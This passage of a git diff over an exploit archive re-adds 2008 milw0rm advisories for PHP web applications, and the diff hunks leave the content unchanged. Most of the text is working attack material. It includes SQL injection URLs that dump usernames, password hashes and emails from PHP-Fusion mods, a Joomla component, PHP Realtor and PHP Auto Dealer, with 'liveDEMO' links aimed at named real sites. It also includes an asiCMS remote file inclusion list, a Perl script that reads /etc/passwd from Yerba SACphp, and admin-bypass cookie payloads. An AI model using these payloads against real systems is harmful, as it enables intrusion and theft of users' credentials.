+http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_name,2+from+fusion_users--&page=1
+
+password: 
+http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_password,2+from+fusion_users--&page=1
+
+email:
+http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_email,2+from+fusion_users--&page=1
+--------------------------------
+
+
+[+] liveDEMO: 
+
+http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_name,2+from+fusion_users--&page=1
+http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_password,2+from+fusion_users--&page=1
+http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_email,2+from+fusion_users--&page=1
+============================
++Proud 2 be Albanian
++Proud 2 be Muslim
++United States of Albania
+============================
+
+# milw0rm.com [2008-10-05]
diff --git a/platforms/php/webapps/6682.txt b/platforms/php/webapps/6682.txt
index 78a8ef9b7..0b6cf44b7 100755
--- a/platforms/php/webapps/6682.txt
+++ b/platforms/php/webapps/6682.txt
@@ -1,38 +1,38 @@
-########################################################
-PHP-Fusion Mod raidtracker_panel (INFO_RAID_ID) Remote SQL Injection Vulnerability
-########################################################
-
-++++++++++++++++++++++++++++
-Author :         boom3rang
-webpage :    www.khg-crew.ws
-greetz :    H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group=-]
-++++++++++++++++++++++++++++
-
-
-[+] Dork:      infusions/raidtracker_panel/thisraidprogress.php?
-
-[+] Example:         http://localhost/infusions/raidtracker_panel/thisraidprogress.php?INFO_RAID_ID=[ exploit ]
-
-[+] Exploit
---------------------------------
-
-http://www.xxxxxxx.com/infusions/raidtracker_panel/thisraidprogress.php?INFO_RAID_ID=-9999+union+all+select+1,2,3,user_name,user_password,6+from+fusion_users--
-
---------------------------------
-
-
-[+] liveDEMO: 
-
-http://differenceguild.com/infusions/raidtracker_panel/thisraidprogress.php?INFO_RAID_ID=-9999+union+all+select+1,2,3,user_name,user_password,6+from+fusion_users--
-
-ps. 
-Raidgroup: [ Here username]
-Ingame Raid ID: [ Here password ]
-
-============================
-+Proud 2 be Albanian
-+Proud 2 be Muslim
-+United States of Albania
-============================
-
-# milw0rm.com [2008-10-05]
+########################################################
+PHP-Fusion Mod raidtracker_panel (INFO_RAID_ID) Remote SQL Injection Vulnerability
+########################################################
+
+++++++++++++++++++++++++++++
+Author :         boom3rang
+webpage :    www.khg-crew.ws
+greetz :    H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group=-]
+++++++++++++++++++++++++++++
+
+
+[+] Dork:      infusions/raidtracker_panel/thisraidprogress.php?
+
+[+] Example:         http://localhost/infusions/raidtracker_panel/thisraidprogress.php?INFO_RAID_ID=[ exploit ]
+
+[+] Exploit
+--------------------------------
+
+http://www.xxxxxxx.com/infusions/raidtracker_panel/thisraidprogress.php?INFO_RAID_ID=-9999+union+all+select+1,2,3,user_name,user_password,6+from+fusion_users--
+
+--------------------------------
+
+
+[+] liveDEMO: 
+
+http://differenceguild.com/infusions/raidtracker_panel/thisraidprogress.php?INFO_RAID_ID=-9999+union+all+select+1,2,3,user_name,user_password,6+from+fusion_users--
+
+ps. 
+Raidgroup: [ Here username]
+Ingame Raid ID: [ Here password ]
+
+============================
++Proud 2 be Albanian
++Proud 2 be Muslim
++United States of Albania
+============================
+
+# milw0rm.com [2008-10-05]
diff --git a/platforms/php/webapps/6683.txt b/platforms/php/webapps/6683.txt
index 0384fc533..0ab637a3e 100755
--- a/platforms/php/webapps/6683.txt
+++ b/platforms/php/webapps/6683.txt
@@ -1,40 +1,40 @@
-########################################################
-PHP-Fusion Mod recept (kat_id) Remote SQL Injection Vulnerability
-########################################################
-
-++++++++++++++++++++++++++++
-Author :         boom3rang
-webpage :    www.khg-crew.ws
-greetz :    H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group-=]
-++++++++++++++++++++++++++++
-
-
-[+] Dork:     infusions/recept/recept.php?
-
-[+] Example:         http://localhost/infusions/recept/recept.php?click=kategorier&kat_id=[ exploit ]
-
-[+] Exploit
---------------------------------
-username:
-http://localhost/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_name,4,5,6,7+from+fusion_users--+
-
-password: 
-http://localhost/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_password,4,5,6,7+from+fusion_users--+
-
-email:
-http://localhost/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_email,4,5,6,7+from+fusion_users--+
---------------------------------
-
-
-[+] liveDEMO: 
-
-http://usmalayali.com/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_password,4,5,6,7+from+fusion_users--+
-
-
-============================
-+Proud 2 be Albanian
-+Proud 2 be Muslim
-+United States of Albania
-============================
-
-# milw0rm.com [2008-10-05]
+########################################################
+PHP-Fusion Mod recept (kat_id) Remote SQL Injection Vulnerability
+########################################################
+
+++++++++++++++++++++++++++++
+Author :         boom3rang
+webpage :    www.khg-crew.ws
+greetz :    H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group-=]
+++++++++++++++++++++++++++++
+
+
+[+] Dork:     infusions/recept/recept.php?
+
+[+] Example:         http://localhost/infusions/recept/recept.php?click=kategorier&kat_id=[ exploit ]
+
+[+] Exploit
+--------------------------------
+username:
+http://localhost/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_name,4,5,6,7+from+fusion_users--+
+
+password: 
+http://localhost/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_password,4,5,6,7+from+fusion_users--+
+
+email:
+http://localhost/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_email,4,5,6,7+from+fusion_users--+
+--------------------------------
+
+
+[+] liveDEMO: 
+
+http://usmalayali.com/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_password,4,5,6,7+from+fusion_users--+
+
+
+============================
++Proud 2 be Albanian
++Proud 2 be Muslim
++United States of Albania
+============================
+
+# milw0rm.com [2008-10-05]
diff --git a/platforms/php/webapps/6684.txt b/platforms/php/webapps/6684.txt
index 435cf17a8..74eaf13c5 100755
--- a/platforms/php/webapps/6684.txt
+++ b/platforms/php/webapps/6684.txt
@@ -1,35 +1,35 @@
-########################################################
-PHP-Fusion Mod triscoop_race_system (raceid) Remote SQL Injection Vulnerability
-########################################################
-
-++++++++++++++++++++++++++++
-Author :         boom3rang
-webpage :    www.khg-crew.ws
-greetz :    H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group-=]
-++++++++++++++++++++++++++++
-
-
-[+] Dork:     infusions/triscoop_race_system/race_details.php?
-
-[+] Example:         http://localhost/infusions/triscoop_race_system/race_details.php?raceid=[ exploit ]
-
-[+] Exploit
---------------------------------
-
-http://localhost/infusions/triscoop_race_system/race_details.php?raceid=-9999+union+all+select+1,null,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users--
-
---------------------------------
-
-
-[+] liveDEMO: 
-
-http://www.triscoop.com/infusions/triscoop_race_system/race_details.php?raceid=-9999+union+all+select+1,user_name,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users--
-
-
-============================
-+Proud 2 be Albanian
-+Proud 2 be Muslim
-+United States of Albania
-============================
-
-# milw0rm.com [2008-10-05]
+########################################################
+PHP-Fusion Mod triscoop_race_system (raceid) Remote SQL Injection Vulnerability
+########################################################
+
+++++++++++++++++++++++++++++
+Author :         boom3rang
+webpage :    www.khg-crew.ws
+greetz :    H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group-=]
+++++++++++++++++++++++++++++
+
+
+[+] Dork:     infusions/triscoop_race_system/race_details.php?
+
+[+] Example:         http://localhost/infusions/triscoop_race_system/race_details.php?raceid=[ exploit ]
+
+[+] Exploit
+--------------------------------
+
+http://localhost/infusions/triscoop_race_system/race_details.php?raceid=-9999+union+all+select+1,null,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users--
+
+--------------------------------
+
+
+[+] liveDEMO: 
+
+http://www.triscoop.com/infusions/triscoop_race_system/race_details.php?raceid=-9999+union+all+select+1,user_name,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users--
+
+
+============================
++Proud 2 be Albanian
++Proud 2 be Muslim
++United States of Albania
+============================
+
+# milw0rm.com [2008-10-05]
diff --git a/platforms/php/webapps/6685.txt b/platforms/php/webapps/6685.txt
index a093bd622..c3411bb19 100755
--- a/platforms/php/webapps/6685.txt
+++ b/platforms/php/webapps/6685.txt
@@ -1,74 +1,74 @@
-===========================================================================================
-
-
-  [o] asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerability
-
-       Software : asiCMS version alpha 0.208
-       Vendor   : http://asicms.sourceforge.net/
-       Download : http://sourceforge.net/project/showfiles.php?group_id=203457
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-
-
-===========================================================================================
-
-
-  [o] Vulnerable file
-
-       classes/Auth/OpenID/Association.php
-       classes/Auth/OpenID/BigMath.php
-       classes/Auth/OpenID/DiffieHellman.php
-       classes/Auth/OpenID/DumbStore.php
-       classes/Auth/OpenID/Extension.php
-       classes/Auth/OpenID/FileStore.php
-       classes/Auth/OpenID/HMAC.php
-       classes/Auth/OpenID/MemcachedStore.php
-       classes/Auth/OpenID/Message.php
-       classes/Auth/OpenID/Nonce.php
-       classes/Auth/OpenID/SQLStore.php
-       classes/Auth/OpenID/SReg.php
-       classes/Auth/OpenID/TrustRoot.php
-       classes/Auth/OpenID/URINorm.php
-       classes/Auth/Yadis/XRDS.php
-       classes/Auth/Yadis/XRI.php
-       classes/Auth/Yadis/XRIRes.php
-
-      All the file is affected by _ENV[asicms][path] variable
-
-
-
-  [o] Exploit
-
-       http://localhost/[path]/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=
-       http://localhost/[path]/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=
-       http://localhost/[path]/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=
-       http://localhost/[path]/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=
-       http://localhost/[path]/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=
-       http://localhost/[path]/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=
-       http://localhost/[path]/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=
-       http://localhost/[path]/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=
-       http://localhost/[path]/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=
-       http://localhost/[path]/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=
-       http://localhost/[path]/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=
-       http://localhost/[path]/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=
-       http://localhost/[path]/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=
-       http://localhost/[path]/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=
-       http://localhost/[path]/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=
-       http://localhost/[path]/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=
-       http://localhost/[path]/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=
-
-
-===========================================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ www.mainhack.com ]
-       VOP Crew [ Vaksin13 OoN_BoY Paman ]
-       H312Y yooogy mousekill }^-^{ k1tk4t
-       skulmatic olibekas ulga Cungkee str0ke
-
-        
-===========================================================================================
-
-# milw0rm.com [2008-10-06]
+===========================================================================================
+
+
+  [o] asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerability
+
+       Software : asiCMS version alpha 0.208
+       Vendor   : http://asicms.sourceforge.net/
+       Download : http://sourceforge.net/project/showfiles.php?group_id=203457
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+
+
+===========================================================================================
+
+
+  [o] Vulnerable file
+
+       classes/Auth/OpenID/Association.php
+       classes/Auth/OpenID/BigMath.php
+       classes/Auth/OpenID/DiffieHellman.php
+       classes/Auth/OpenID/DumbStore.php
+       classes/Auth/OpenID/Extension.php
+       classes/Auth/OpenID/FileStore.php
+       classes/Auth/OpenID/HMAC.php
+       classes/Auth/OpenID/MemcachedStore.php
+       classes/Auth/OpenID/Message.php
+       classes/Auth/OpenID/Nonce.php
+       classes/Auth/OpenID/SQLStore.php
+       classes/Auth/OpenID/SReg.php
+       classes/Auth/OpenID/TrustRoot.php
+       classes/Auth/OpenID/URINorm.php
+       classes/Auth/Yadis/XRDS.php
+       classes/Auth/Yadis/XRI.php
+       classes/Auth/Yadis/XRIRes.php
+
+      All the file is affected by _ENV[asicms][path] variable
+
+
+
+  [o] Exploit
+
+       http://localhost/[path]/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=
+       http://localhost/[path]/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=
+       http://localhost/[path]/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=
+       http://localhost/[path]/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=
+       http://localhost/[path]/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=
+       http://localhost/[path]/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=
+       http://localhost/[path]/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=
+       http://localhost/[path]/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=
+       http://localhost/[path]/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=
+       http://localhost/[path]/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=
+       http://localhost/[path]/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=
+       http://localhost/[path]/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=
+       http://localhost/[path]/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=
+       http://localhost/[path]/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=
+       http://localhost/[path]/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=
+       http://localhost/[path]/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=
+       http://localhost/[path]/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=
+
+
+===========================================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ www.mainhack.com ]
+       VOP Crew [ Vaksin13 OoN_BoY Paman ]
+       H312Y yooogy mousekill }^-^{ k1tk4t
+       skulmatic olibekas ulga Cungkee str0ke
+
+        
+===========================================================================================
+
+# milw0rm.com [2008-10-06]
diff --git a/platforms/php/webapps/6687.pl b/platforms/php/webapps/6687.pl
index 8e1255cfa..cdb99dbb9 100755
--- a/platforms/php/webapps/6687.pl
+++ b/platforms/php/webapps/6687.pl
@@ -1,53 +1,53 @@
-#! /usr/bin/perl
-# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-# Yerba SACphp <= 6.3 / Local File Inclusion Exploit
-# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-# Program: Yerba SACphp
-# Version: <= 6.3
-# File affected: index.php
-# Download: http://sourceforge.net/projects/yerba/
-#
-#
-# Found by Pepelux 
-# eNYe-Sec - www.enye-sec.org
-#
-# Bug:
-# 37-		include("modulos/$mod/mod_nucleo.php");
-
-
-use LWP::UserAgent;
-use HTTP::Request::Common;
-
-my ($host, $file) = @ARGV ;
-
-unless($ARGV[1]){
-	print "\nUsage: perl $0  \n";
-	print "\tex: perl $0 http://localhost /etc/passwd\n\n";
-	exit 1;
-}
-
-$host = 'http://'.$host if ($host !~ /^http:/);
-$host .= "/" if ($host !~ /\/\$/);
-
-my $ua = LWP::UserAgent->new();
-$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
-$ua->timeout(10);
-
-my $request = HTTP::Request->new();
-my $response;
-my $url = $host."index.php";
-
-my $req = HTTP::Request->new(POST => $host."index.php");
-$req->content_type('application/x-www-form-urlencoded');
-$req->content("mod=../../../../../".$file."%00");
-
-$request = $ua->request($req);
-$result = $request->content;
-
-$result =~ s/<[^>]*>//g;
-
-print $result . "\n";
-
-exit;
-
-# milw0rm.com [2008-10-06]
+#! /usr/bin/perl
+# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+# Yerba SACphp <= 6.3 / Local File Inclusion Exploit
+# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+# Program: Yerba SACphp
+# Version: <= 6.3
+# File affected: index.php
+# Download: http://sourceforge.net/projects/yerba/
+#
+#
+# Found by Pepelux 
+# eNYe-Sec - www.enye-sec.org
+#
+# Bug:
+# 37-		include("modulos/$mod/mod_nucleo.php");
+
+
+use LWP::UserAgent;
+use HTTP::Request::Common;
+
+my ($host, $file) = @ARGV ;
+
+unless($ARGV[1]){
+	print "\nUsage: perl $0  \n";
+	print "\tex: perl $0 http://localhost /etc/passwd\n\n";
+	exit 1;
+}
+
+$host = 'http://'.$host if ($host !~ /^http:/);
+$host .= "/" if ($host !~ /\/\$/);
+
+my $ua = LWP::UserAgent->new();
+$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
+$ua->timeout(10);
+
+my $request = HTTP::Request->new();
+my $response;
+my $url = $host."index.php";
+
+my $req = HTTP::Request->new(POST => $host."index.php");
+$req->content_type('application/x-www-form-urlencoded');
+$req->content("mod=../../../../../".$file."%00");
+
+$request = $ua->request($req);
+$result = $request->content;
+
+$result =~ s/<[^>]*>//g;
+
+print $result . "\n";
+
+exit;
+
+# milw0rm.com [2008-10-06]
diff --git a/platforms/php/webapps/6691.txt b/platforms/php/webapps/6691.txt
index 1b03a0745..76b9df376 100755
--- a/platforms/php/webapps/6691.txt
+++ b/platforms/php/webapps/6691.txt
@@ -1,21 +1,21 @@
- [*]~======================================================~[*] 
- [*]   Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities  [*]
- [*]~======================================================~[*]
- 
- [?] Discovered By StAkeR - StAkeR[at]hotmail[dot]it
- [?] Discovered On 07/10/2008
- [?] http://downloads.sourceforge.net/yerba/SACphp-6_28.tgz?modtime=1025222400&big_mirror=0
-
- [?] Admin Login ByPass
- [?] javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw=="
-
- [?] Privilege Escalation 
- [?] index.php?SID=[path (base64 encoded)]
-
- [?] Arbitrary Database Download
- [?] index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ==
-
- [?] Arbitrary Add Admin 
- [?] index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ==
-
-# milw0rm.com [2008-10-07]
+ [*]~======================================================~[*] 
+ [*]   Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities  [*]
+ [*]~======================================================~[*]
+ 
+ [?] Discovered By StAkeR - StAkeR[at]hotmail[dot]it
+ [?] Discovered On 07/10/2008
+ [?] http://downloads.sourceforge.net/yerba/SACphp-6_28.tgz?modtime=1025222400&big_mirror=0
+
+ [?] Admin Login ByPass
+ [?] javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw=="
+
+ [?] Privilege Escalation 
+ [?] index.php?SID=[path (base64 encoded)]
+
+ [?] Arbitrary Database Download
+ [?] index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ==
+
+ [?] Arbitrary Add Admin 
+ [?] index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ==
+
+# milw0rm.com [2008-10-07]
diff --git a/platforms/php/webapps/6692.txt b/platforms/php/webapps/6692.txt
index dd89c64a9..2121e6c2e 100755
--- a/platforms/php/webapps/6692.txt
+++ b/platforms/php/webapps/6692.txt
@@ -1,16 +1,16 @@
-Name	:	Joomla Component com_hotspots (w) Remote SQL Injection Vulnerability
-Author	:	cOndemned
-Data	:	07.10.2008 AD
-Greetz	:	sid.psycho, h07, ZaBeaTy, irk4z, Necro, str0ke, t0pP8uZz, TWT, suN8Hclf, 0in and Avantura.... 
-
-
-PoC		:
-
-	http://[host]/index.php?Itemid=53&option=com_hotspots&task=w&w=5+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users--
-	
-	
-	
-Just 4 fun
-	
-
-# milw0rm.com [2008-10-07]
+Name	:	Joomla Component com_hotspots (w) Remote SQL Injection Vulnerability
+Author	:	cOndemned
+Data	:	07.10.2008 AD
+Greetz	:	sid.psycho, h07, ZaBeaTy, irk4z, Necro, str0ke, t0pP8uZz, TWT, suN8Hclf, 0in and Avantura.... 
+
+
+PoC		:
+
+	http://[host]/index.php?Itemid=53&option=com_hotspots&task=w&w=5+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users--
+	
+	
+	
+Just 4 fun
+	
+
+# milw0rm.com [2008-10-07]
diff --git a/platforms/php/webapps/6693.txt b/platforms/php/webapps/6693.txt
index 2be218bf8..a1bb4f340 100755
--- a/platforms/php/webapps/6693.txt
+++ b/platforms/php/webapps/6693.txt
@@ -1,45 +1,45 @@
-________                                            ._.
-\______ \_______  ____ ______  ______ ____   ____   | |
- |    |  \_  __ \/  _ \\____ \/  ___// __ \_/ ___\  | |
- |    `   \  | \(  <_> )  |_> >___ \\  ___/\  \___   \|
-/_______  /__|   \____/|   __/____  >\___  >\___  >  __
-        \/             |__|       \/     \/     \/   \/
-.____          ___.           
-|    |   _____ \_ |__   ______
-|    |   \__  \ | __ \ /  ___/
-|    |___ / __ \| \_\ \\___ \ 
-|_______ (____  /___  /____  >
-        \/    \/    \/     \/ 
-
----------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]
-
------[]===========[]=> Yourownbux v4.0 Blind SQL Injection Vulnerability ( referrals.php )
-
------[]===========[]=> Discovered By: Tec-n0x 
-		 	Contact: Tec-n0x  hotmail  com
-
------[]===========[]=> DropSec.com =~ Lab's ..!!
-
------[]===========[]=> Gr33tz:
-			Celciuz, MurdeR, OzX, N.O.X, JosS, DDoS && All Friends
-			
-			Special Gr33tz to: C1c4tr1Z ( http://lowsec.org )
-
----------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]
-
-		POC: 
-
-	Go to => http://site.com/referrals.php 	( Logged in )
-	javascript:document.cookie="usNick=' AND 1=0 /*; expires=Thu, 2 Aug 2020 20:45:20 UTC; path=/";
-
-		=> Modify : ' AND 1=0 /* With Injection's.
-				
-		=> Example: ' AND ascii(substring((SELECT password FROM yob_users where id=1),1,1))=100 /*
-		
-		=> When You got the Hash ... Add the cookie usNick with the user [ Extract it with blind if you dont know ] 
-		 and the SHA1 Hash ( Exploit is going to be available Next Week on DropSec.com ).
-
----------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]
-				
-
-# milw0rm.com [2008-10-07]
+________                                            ._.
+\______ \_______  ____ ______  ______ ____   ____   | |
+ |    |  \_  __ \/  _ \\____ \/  ___// __ \_/ ___\  | |
+ |    `   \  | \(  <_> )  |_> >___ \\  ___/\  \___   \|
+/_______  /__|   \____/|   __/____  >\___  >\___  >  __
+        \/             |__|       \/     \/     \/   \/
+.____          ___.           
+|    |   _____ \_ |__   ______
+|    |   \__  \ | __ \ /  ___/
+|    |___ / __ \| \_\ \\___ \ 
+|_______ (____  /___  /____  >
+        \/    \/    \/     \/ 
+
+---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]
+
+-----[]===========[]=> Yourownbux v4.0 Blind SQL Injection Vulnerability ( referrals.php )
+
+-----[]===========[]=> Discovered By: Tec-n0x 
+		 	Contact: Tec-n0x  hotmail  com
+
+-----[]===========[]=> DropSec.com =~ Lab's ..!!
+
+-----[]===========[]=> Gr33tz:
+			Celciuz, MurdeR, OzX, N.O.X, JosS, DDoS && All Friends
+			
+			Special Gr33tz to: C1c4tr1Z ( http://lowsec.org )
+
+---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]
+
+		POC: 
+
+	Go to => http://site.com/referrals.php 	( Logged in )
+	javascript:document.cookie="usNick=' AND 1=0 /*; expires=Thu, 2 Aug 2020 20:45:20 UTC; path=/";
+
+		=> Modify : ' AND 1=0 /* With Injection's.
+				
+		=> Example: ' AND ascii(substring((SELECT password FROM yob_users where id=1),1,1))=100 /*
+		
+		=> When You got the Hash ... Add the cookie usNick with the user [ Extract it with blind if you dont know ] 
+		 and the SHA1 Hash ( Exploit is going to be available Next Week on DropSec.com ).
+
+---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]
+				
+
+# milw0rm.com [2008-10-07]
diff --git a/platforms/php/webapps/6694.txt b/platforms/php/webapps/6694.txt
index c57b2637c..df7704d5e 100755
--- a/platforms/php/webapps/6694.txt
+++ b/platforms/php/webapps/6694.txt
@@ -1,37 +1,37 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL Injection Vulnerability
-##
-## PHP Realtor 1.5 ( view_cat.php v_cat )
-##
-## http://selectdevelopment.com/
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ReaL-HaCk.NeT
-##
-## Email  : SQL@Hotmail.it
-##
-## SYRIAN Arab HACkErS
-########################
-########################
-##
-## -[[: Exploite :]]-
-##
-## www.TraGeT./view_cat.php?v_cat=1+union+select+concat_ws(0x3a,username,password)MrSQL+from+users+limit+1,1--
-##
-########################
-########################
-
-#########################################################################################################
-#########################################################################################################
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
-:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS ::
-#########################################################################################################
-#########################################################################################################
-
-# milw0rm.com [2008-10-07]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL Injection Vulnerability
+##
+## PHP Realtor 1.5 ( view_cat.php v_cat )
+##
+## http://selectdevelopment.com/
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ReaL-HaCk.NeT
+##
+## Email  : SQL@Hotmail.it
+##
+## SYRIAN Arab HACkErS
+########################
+########################
+##
+## -[[: Exploite :]]-
+##
+## www.TraGeT./view_cat.php?v_cat=1+union+select+concat_ws(0x3a,username,password)MrSQL+from+users+limit+1,1--
+##
+########################
+########################
+
+#########################################################################################################
+#########################################################################################################
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS ::
+#########################################################################################################
+#########################################################################################################
+
+# milw0rm.com [2008-10-07]
diff --git a/platforms/php/webapps/6695.txt b/platforms/php/webapps/6695.txt
index 927a76bba..466b64baa 100755
--- a/platforms/php/webapps/6695.txt
+++ b/platforms/php/webapps/6695.txt
@@ -1,37 +1,37 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL Injection Vulnerability
-##
-## PHP Auto Dealer 2.7 ( view_cat.php v_cat )
-##
-## http://selectdevelopment.com/
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ReaL-HaCk.NeT
-##
-## Email  : SQL@Hotmail.it
-##
-## SYRIAN Arab HACkErS
-########################
-########################
-##
-## -[[: Exploite :]]-
-##
-## www.TraGeT./view_cat.php?v_cat=-1/**/UNION/**/SELECT/**/CONCAT_WS(0x3a,username,password)MrSQL/**/FROM/**/users/**/limit+1,1--
-##
-########################
-########################
-
-#########################################################################################################
-#########################################################################################################
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
-:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS ::
-#########################################################################################################
-#########################################################################################################
-
-# milw0rm.com [2008-10-07]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL Injection Vulnerability
+##
+## PHP Auto Dealer 2.7 ( view_cat.php v_cat )
+##
+## http://selectdevelopment.com/
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ReaL-HaCk.NeT
+##
+## Email  : SQL@Hotmail.it
+##
+## SYRIAN Arab HACkErS
+########################
+########################
+##
+## -[[: Exploite :]]-
+##
+## www.TraGeT./view_cat.php?v_cat=-1/**/UNION/**/SELECT/**/CONCAT_WS(0x3a,username,password)MrSQL/**/FROM/**/users/**/limit+1,1--
+##
+########################
